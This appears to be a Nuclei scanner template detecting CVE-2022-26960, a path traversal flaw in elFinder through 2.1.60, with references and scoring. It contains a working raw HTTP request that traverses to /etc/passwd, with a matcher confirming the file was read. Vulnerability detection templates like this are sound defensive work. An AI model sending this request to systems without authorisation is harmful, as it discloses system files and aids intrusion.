41 lines
1.3 KiB
YAML
41 lines
1.3 KiB
YAML
|
id: CVE-2022-26960
|
||
|
|
||
|
info:
|
||
|
name: elFinder <=2.1.60 - Local File Inclusion
|
||
|
author: pikpikcu
|
||
|
severity: critical
|
||
|
description: |
|
||
|
elFinder through 2.1.60 is affected by local file inclusion via connector.minimal.php. This allows unauthenticated remote attackers to read, write, and browse files outside the configured document root. This is due to improper handling of absolute file paths.
|
||
|
reference:
|
||
|
- https://www.synacktiv.com/publications/elfinder-the-story-of-a-repwning.html
|
||
|
- https://github.com/Studio-42/elFinder/commit/3b758495538a448ac8830ee3559e7fb2c260c6db
|
||
|
- https://www.synacktiv.com/publications.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-26960
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
|
||
|
cvss-score: 9.1
|
||
|
cve-id: CVE-2022-26960
|
||
|
cwe-id: CWE-22
|
||
|
metadata:
|
||
|
verified: true
|
||
|
tags: cve,cve2022,lfi,elfinder
|
||
|
|
||
|
http:
|
||
|
- raw:
|
||
|
- |
|
||
|
GET /elfinder/php/connector.minimal.php?cmd=file&target=l1_<@base64>/var/www/html/elfinder/files//..//..//..//..//..//../etc/passwd<@/base64>&download=1 HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: regex
|
||
|
regex:
|
||
|
- "root:.*:0:0:"
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|
||
|
|
||
|
# Enhanced by mp on 2022/07/05
|